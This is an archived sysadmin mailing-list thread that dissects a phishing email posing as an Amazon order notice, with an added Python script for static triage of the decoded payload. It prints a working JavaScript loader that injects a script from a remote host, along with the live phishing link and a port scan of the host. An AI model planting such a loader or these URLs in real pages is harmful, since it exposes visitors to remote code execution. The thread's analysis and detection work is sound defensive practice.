If he were fresh from a CISSP exam, he would have decoded the payload in
walford.html as the following JavaScript.

 

function ljs() {
  try {
    var s = document.createElement("script");
    s.setAttribute("src", "http://saeghiebeesiogoh.in:3129/js");
    document.body.appendChild(s);
  } catch (e) {}
}
setTimeout("ljs()", 500);

 

Unfortunately, I was not able to get http://saeghiebeesiogoh.in:3129/js
to see what the true intentions were.
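
Added example, not part of the original thread: a static triage pass in Python over the decoded loader quoted above, which reports the injected remote script source and the traits that make it worth flagging. It only reads the text (nothing is fetched or executed); the function names and finding labels are this example's own.

```python
import re
from urllib.parse import urlsplit

# The decoded loader as quoted in the message above; handled as inert text only.
SAMPLE = (
    'function ljs(){try{var s=document.createElement("script");'
    's.setAttribute("src","http://saeghiebeesiogoh.in:3129/js");'
    'document.body.appendChild(s)}catch(e){}}setTimeout("ljs()",500);'
)

CREATE_SCRIPT = re.compile(r'createElement\(\s*["\']script["\']\s*\)', re.I)
# src set through setAttribute("src", ...) or a direct .src = "..." assignment
SRC_ASSIGN = re.compile(
    r'(?:setAttribute\(\s*["\']src["\']\s*,\s*|\.src\s*=\s*)["\']([^"\']+)["\']',
    re.I,
)
STRING_TIMER = re.compile(r'set(?:Timeout|Interval)\(\s*["\']')  # eval-style timer
SILENT_CATCH = re.compile(r'catch\s*\(\s*\w*\s*\)\s*\{\s*\}')
DEFAULT_PORTS = {"http": 80, "https": 443}


def defang(url: str) -> str:
    """Make a URL safe to paste into tickets and mail."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def triage(js: str) -> dict:
    """Return finding labels and remote script sources for decoded JavaScript."""
    findings, remote = [], []
    urls = SRC_ASSIGN.findall(js)
    if CREATE_SCRIPT.search(js) and urls:
        findings.append("dynamic-script-injection")
    if STRING_TIMER.search(js):
        findings.append("string-argument-timer")
    if SILENT_CATCH.search(js):
        findings.append("errors-silently-swallowed")
    for url in urls:
        parts = urlsplit(url)
        try:
            port = parts.port or DEFAULT_PORTS.get(parts.scheme)
        except ValueError:  # malformed port in the sample
            port = None
        if port is not None and port != DEFAULT_PORTS.get(parts.scheme):
            findings.append("non-default-port")
        remote.append({"host": parts.hostname, "port": port, "url": defang(url)})
    return {"findings": findings, "remote_scripts": remote}


if __name__ == "__main__":
    print(triage(SAMPLE))
```

Dynamic script injection on its own is also what ordinary tag loaders do, so the label is a lead for review; here it coincides with a string-argument timer, an empty catch block and an odd port.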

 

From: [email protected]
[mailto:[email protected]] On Behalf Of
James Rankin
Sent: Tuesday, February 23, 2010 11:45 AM
To: NT System Admin Issues
Subject: Re: Order Notify #401186

 

Now there's a guy who's obviously just fresh from a CISSP exam :-)

On 23 February 2010 16:36, Ziots, Edward <[email protected]> wrote:

http://80.109.240.71/~e.loesberg/walford.html
<http://80.109.240.71/%7Ee.loesberg/walford.html> 

 

Is the link inside the email. It's definitely a phishing attack. Single
box system behind a firewall (2 hops from source)

 

Name:    members.chello.nl

Address:  80.109.240.71

(it's in Vienna, Austria)

 

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack ProFTPD 1.2.10
80/tcp open  http    syn-ack Apache httpd

 

Like they say, never click the link. And don't answer the email, it lets
them know you are there.. and they will just keep spamming you...

 

Z

 

From: Sherry Abercrombie [mailto:[email protected]]
Sent: Tuesday, February 23, 2010 10:37 AM
To: NT System Admin Issues
Subject: Re: Order Notify #401186

 

GMail is good.  Marked this one as spam and sent to my spam folder, with
a nice little warning that it might not be from who it says and to be
careful, etc etc.  

On Tue, Feb 23, 2010 at 9:34 AM, James Rankin <[email protected]>
wrote:

Oooohhh....I must click on the link, seeing as though it has some funky
numbers instead of letters. Looks decidedly unsuspicious

On 23 February 2010 15:29, Carol Fee <[email protected]> wrote:

What the heck ??????

 

CFee

From: Customer Support [mailto:[email protected]] 
Sent: Monday, February 22, 2010 6:55 PM
To: NT System Admin Issues
Subject: Order Notify #401186

 


Your Order id:822324764225
Info <http://80.109.240.71/%7Ee.loesberg/walford.html> 

Thank you.
Amazon.com Support

-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put
into the machine wrong figures, will the right answers come out?' I am
not able rightly to apprehend the kind of confusion of ideas that could
provoke such a question."

-- 
Sherry Abercrombie

"Any sufficiently advanced technology is indistinguishable from magic."
Arthur C. Clarke

 

 

 

 



